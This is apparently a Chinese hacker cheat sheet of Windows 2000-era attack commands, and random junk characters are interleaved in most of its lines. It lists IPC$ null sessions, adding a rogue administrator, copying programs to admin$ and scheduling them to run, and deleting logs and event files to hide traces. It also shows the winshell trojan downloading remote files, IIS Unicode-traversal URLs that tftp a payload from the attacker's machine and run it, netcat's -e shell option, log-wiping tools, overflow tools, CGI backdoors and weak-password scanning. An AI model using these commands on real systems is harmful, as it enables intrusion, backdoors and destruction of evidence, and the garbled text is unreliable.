网管和黑客都必须知道的命令
&Hnz8Or! 常用的几条NET命令:
E<*xx#p "J3x_~,[4m (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
_Bj":rzY yaV|AB$v (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
QSf|nNT uXl3k:_n (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
2 8u_!f[ '/%H3A#L (查看远程主机时间) net time \\IP地址
J4U1t2@)9 Mrb) (定时启动某个程序) at \\IP地址 02:18 readme.exe
^LzF@{ G _h1mF<\ X^ (查看共享) net view \\IP地址
7 Fsay+a @9|hMo (查看netbios工作组列表) nbtstat -A IP地址
]
@fk] ]R |(^PS8wG (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
f6"Z'{j ZSm3 XXk (这两条把自己增加到管理员组): net user 用户名 密码 /add
% %UE+u@J Y\'}a+:@Ph net localgroup Administrators 用户名 /add
+x}<IS8 Fv`,3aNB (断开连接) net use \\IP地址\ipc$ /delete
6;5Ss?ep iDrZc
扫尾:
Q=yg8CQ [)X\|pO& del C:\winnt\system32\logfiles\*.*
Z;)%%V%o B4 }bVjs del C:\winnt\ssytem32\config\*.evt
hehFEyx [z9Z5sLO del C:\winnt\system32\dtclog\*.*
'@P^0+B!(. KJZ4AWH` del C:\winnt\system32\*.log
+m,yA mEEd )@bQu~Y del C:\winnt\system32\*.txt
3"\l u?-E x'R`.
!g3 del C:\winnt\*.txt
\Y}8S/] mpJ#:}n del C:\winnt\*.log
D^;Uq8NDKq `Ryp% Bn 一、netsvc.exe
<1M-Ro?5k Aq7osU1B 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
@7n"yp*" \1Em`nvOX netsvc /list \\IP地址
r",GC] sCHJ&>m5- netsvc schedule \\IP地址 /query
"C`Ub [}]Q?*_ netsvc \\IP地址 schedule /start
S>1Iky|
-A!%*9Z 二、OpenTelnet.exe
7Hu3>4<
J5jvouR 远程启动主机的Telnet服务,并绑定端口到7878,例如:
r]36zX v jrh43
\$* OpenTelnet \\IP地址 用户名 密码 1 7878
v/=}B(TDF Ooy7*W'; 然后就可以telnet到主机的7878端口,进入DOS方式下:
jo@J}`\Zt jW@Uo=I[ telnet IP地址 7878
}RqK84K >[*qf9$ 三、winshell.exe
*c+ (- <c/5b]No 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
*~i
])4 /&94 eC p Path (查看winshell主程序的路径信息)
,zY$8y] lHX72s|V b reBoot (重新启动机器)
8}UIbF b|W=pSTY d shutDown (关闭机器)
$E.I84UfX N87B8rDl s Shell (执行后你就会看到可爱的“C:\>”)
?FcAXA/J{ cExS7~* x eXit (退出本次登录会话,此命令并不终止winshell的运行)
*;*r8[U}q rw
#$lP CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
J-hbh &:)Wh[ 四、3389登陆器,GUI方式登录远程主机的
83q6Sv ^y%T~dLkp' 五、elsave.exe
V "h
+L7T @;RXLq/8 事件日志清除工具
u.Dz~$T CeC6hGR5 elsave -s \\IP地址 -l "application" -C
~/P[J vRO
_Q? elsave -s \\IP地址 -l "system" -C
wAW5
Z0D ?5
7Sk+ elsave -s \\IP地址 -l "security" -C
I2 P@L?h D d</`iUq 执行后成功清除应用程序日志,系统日志,安全日志
9q[oa5INd w+CA1q< 六、hbulot.exe
n7-6-
# <e</m)j 开启win2kserver和winxp的3389服务
y
h9*z3 9qG6Pb hbulot [/r]
BF{Y"8u$ b1?'gn~ 使用/r表示安装完成后自动重起目标使设置生效。
S|`o]?nc> dlTt_. 七、nc.exe(netcat.exe)
) hfpwdQ oM`0y@QCf 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
0KOgw*>_ /s}}&u/ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
G<v&4/\p`M ~M4; 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
'1s0D] #4 pB@_ 参数:
u:_,GQ )\ ;;N9>M?b -e prog 程序重定向,一旦连接,就执行 [危险!!]
NHZz _a= s,&Z=zt0R -g gateway source-routing hop point[s], up to 8
JnM["Q=` '(|ofJe! -G num source-routing pointer: 4, 8, 12, ...
_zi| wDe& 1(T^ -h 帮助信息
z ~/` 1 f=K]XTw~ -i secs 延时的间隔
:&9s,l DlMW(4( -l 监听模式,用于入站连接
81
sG x+@rg];m -n 指定数字的IP地址,不能用hostname
N5b!.B x-w Ej8^Zg -o file 记录16进制的传输
iqQD{SRt{ v #j$; -p port 本地端口号
&FN.:_E ckE-",G -r 任意指定本地及远程端口
_>X+ZlpU: 8c^TT& -s addr 本地源地址
rCdu0 gYT b2&0Hx -u UDP模式
vnZC,J ` RdRp.pb8 -v 详细输出——用两个-v可得到更详细的内容
I(BQ34q YGCL2Y -w secs timeout的时间
GDiBl* D p4
^yVa -z 将输入输出关掉——用于扫描时
n]o<S+z 八、TFTPD32.EXE
%aVq+kC h x-&@wMqkc 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
|H+UOEiv,p 8NAON5.! http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
ZeaA%y67U ~%kkeh\j 然后可以直接令文件运行:
*mvlb
(' & t=W}SH http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
mSl.mi(JiZ K^<BW(s 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
+*/Zu`kzX z/@slT 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
9Y_HyOZ*GX 9N3o-= 一、一 Xscan命令行运行参数说明:
p]2128kqx >V8-i` 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
)cMh0SGcM1 jLHkOk5{: 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
S k\K4 Ls+2Zbh xscan -file <主机列表文件名> <检测项目> [其他选项]
Tqn@P 5f K_Aq{ 其中<检测项目> 含义如下:
nazZ*lC ,uhb~N< -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
EaY?aAuS: ra
g Xn -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
O`t&ldU fdi\hg^x -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
,w:U#r~s" sLT3Y}IO -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
!9VY|&fHe -3Z,EaG^ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
1JG'%8}#8 L2i_X@/ [其他选项] 含义如下:
~YWQ2] wIaony -v: 显示详细扫描进度
?Z[[2\DR `%"\@< -p: 跳过Ping不通的主机
#r~# I}U (2E\p -o: 跳过没有检测到开放端口的主机
B Qxs~ A&Usddcp -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10